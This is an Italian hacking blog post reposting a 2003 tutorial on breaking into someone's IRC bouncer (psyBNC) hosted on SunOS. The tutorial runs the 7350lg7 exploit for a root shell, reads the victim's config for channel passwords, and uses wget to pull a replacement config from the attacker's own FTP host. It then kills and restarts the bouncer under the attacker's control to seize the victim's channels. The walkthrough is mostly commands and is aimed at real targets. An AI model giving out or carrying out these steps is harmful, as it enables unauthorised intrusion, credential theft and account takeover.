h4ckarchive v2.2

La nuova risorsa italiana sull’hacking underground

How to hack BNC

with 4 comments

Ecco qui a voi una guida per l’hacking di BNC:

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
How to Hack Bnc
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
10/6/2003
rrd

Salve ragazzi quanti di voi han voluto bucare il bnc del vostro caro
amichetto di irc? magari takkargli anche il chan?
Prima di tutto tengo a precisare che questa guida non specifica tutti i
particolari ma comunque vi crea una base, successivamente la fantasia
vi porterà a far grandissime cose 😉
Inanzitutto la tecnica usata è di basso livello ma comunque fà sempre
bene sapere qualcosa.
Su ircnet la maggiorparte dei bnc presenti, almeno secondo me son montati
su sistemi SunOS oppure linux.
Parecchi hackeretti spavaldi su irc piazzano bnc in maniera stravagante
ma senza pensare che spesso la shell su cui son montati sia buggata. 😉
Quindi prima cosa da fare è quello di osservare un pò il bnc del nostro
amico, quindi facciamogli un whois. Non dirmi cosa è altrimenti ti uccido
Bene in questa guida penseremo ai bnc piazzati su SunOS, quindi vi
consiglio di leggere la guida sul sito.
Bene, vogliamo sapere se il bnc del nostro amico è su un sistema SunOS?
Facciam uno scan alla porta 21 del suo ip 😉
Se vi da risposta con una versione dalla 4.1 alla 5.8 possiamo procedere.
Ok procuriamoci il vecchio exploit 7350lg7 è lanciamo il seguente comando
./7350lg7 -t1 -d ipbnc
attendiamo qualche secondo
Se vi appare #
siamo a galoppo 😉
Per prima cosa dobbiam kittare la shell quindi leggi il Tutorial:
SunOS hack
Una volta kittata la shell, esserci assicurati che la connessione ssh
funzioni possiamo pensare al bel bnc.
I rootkit delle SunOS al 90% piazzano la dir del bnc in:
/dev/cua/…
Quindi digitiamo:
cd /dev/cua/…
Se non va cerchiamo i file:
find / -name nomefile -print
Bene adesso digitiamo:
ls
Se trovate una sola dir con scritto (psybnc,solbnc,bnc)
Digitiamo:
cd nomedir
Ok adesso siamo dentro ;):
Ora spiamo un pò di informazioni che ne dici?
cat psybnc.conf
bene qui avremo davanti tutte le impostazioni del bnc compreso pass dei
canali ;).
||||
Prima di iniziare preparatevi sul mirc tutte le impostazioni del bnc:
real,ident,address,nick ecc.
Inoltre copiatevi il server a cui è connesso il bnc.
||||
Adesso possiamo scegliere due stradine:
1)Sistemare il .conf a nostro piaciere per poterci connettere e poi
killare il bnc.
2)Sistemare il .conf modificando solamente la password di login

Strada 1
Bene adesso lanciamo il comando:
cat psybnc.conf
cerchiamo la stringa:
PSYBNC.SYSTEM.PORT1=porta>>>ci interessa questa
La porta ci interessa perchè il rootkit aveva già nascosto il processo
in precedenza quindi sarete tranquillamente visibili al netstat.
Ok adesso creiamo sul nostro pc un documento di testo con le seguenti:
PSYBNC.SYSTEM.PORT1=portadelconf
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
Ok salviamolo col nome psybnc1.conf.
Mettiamolo sul nostro ftp. Non lo hai? ti ho detto di leggere la guida:
SunOS hack
Ok una volta piazzato mettiamo il file nella shell.
Digitiamo nella shell il seguente comando:
rm psybnc.conf rimuove il vecchio conf
wget http://members.xoom.virgilio.it/mioftp/psybnc1.conf
Se non risolve mettete l ip.
Adesso dobbiamo essere mooolto veloci per fare il tutto:
cat psybnc.pid (legge il numero pid)
kill -9 numerochetiesce (questo comando farà cadere il bnc dell’amico)
rm psybnc.conf (cancella il vecchio conf)
mv psybnc1.conf psybnc.conf (rinomina psybnc1.conf in psybnc.conf)
Ora digitiamo ls:
cerchiamo un file di nome:
solbnc oppure psybnc
Lanciamo la stringa:
./solbnc oppure ./psybnc
Bene adesso veloci apriamo mirc e connettiamoci all’ip e alla porta del
bnc che avevamo settato. Spero abbiate già settato il mirc.
Ok adesso ci chiederà la pass:
./quote pass tuapass
se vi da errore togliete il puntino.
./addserver serverdoveerailbnc :6667
./aidle 1
Bene adesso si connette 😉
Ora dovrete entrare velocemente nei chan in cui era situato il bnc,
se il vostro amico hacker è cosi bravo avrà settato autoop magari da
altri bnc 😉
Io vi consiglio di fare una sola cosa poi scegliete voi:
/setawaynick Nickdelamer’ownz
Uscite dal bnc è non entrate piu. Farete piu bella figura 😉

2 Strada
La seconda strada credo sia piu semplice:
Vi basta entrare in una delle vostre shell dove sia piazzato un bnc
entrare nella dir:
cat psybnc.conf
Cercare la stringa
USER1.USER.PASS==
Bè li ci sarà la pass usata da voi decriptata. avete capito cosa intendo?
Prendete il conf della vittima lo copiate,editate un file di testo
e al posto della sua pass ci mettete la vostra ;):
Naturalmente il tutto seguendo i procedimenti elencati su 😉
Ecco qualche consiglio:
1)Nel conf possiamo trovare anche eventuali proxy usati 😉
2)Nel conf possiamo risalire alla password usata dalla vittima tramite
un decriptatore che spiegherò in altri tutorial
3)Nel conf possiamo trovare eventuali virtualhost
5)Nel conf possiamo trovare eventuali ipv6
Naturalmente trovare queste nel conf è molto semplice 😉
Il breve tutorial termina qui, mi scuso per gli errori ortografici ma
il tempo…. 🙂
Per commenti,suggerimenti,lamentele:
trepalle86@supereva.it

rrd
http://www.nshcrew.cjb.net VOTATELO IL SITO HA BISOGNO DI VOI.

USER1.USER.PASS==`v1F1I’3’z1l0F`h`5
USER1.SERVERS.SERVER1=irc1.us.ircnet.net

Thanks to: http://nsh.altervista.org

Annunci

Written by TheDevil

1 gennaio 2008 a 5:10 am

Pubblicato su IRC Hacking

4 Risposte

Subscribe to comments with RSS.

  1. bnc

    meni

    4 novembre 2008 at 6:34 pm

  2. english please!

    evil

    30 dicembre 2008 at 6:47 am

  3. Does your website have a contact page? I’m having trouble locating it but, I’d like to send you an e-mail.
    I’ve got some creative ideas for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it improve over time.

    Dianna

    16 maggio 2013 at 7:20 pm

  4. Hello it’s me, I am also visiting this website on a regular basis, this web page is genuinely nice and the people are actually sharing good thoughts.

    Jeannette

    23 maggio 2013 at 1:58 pm


Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger hanno fatto clic su Mi Piace per questo: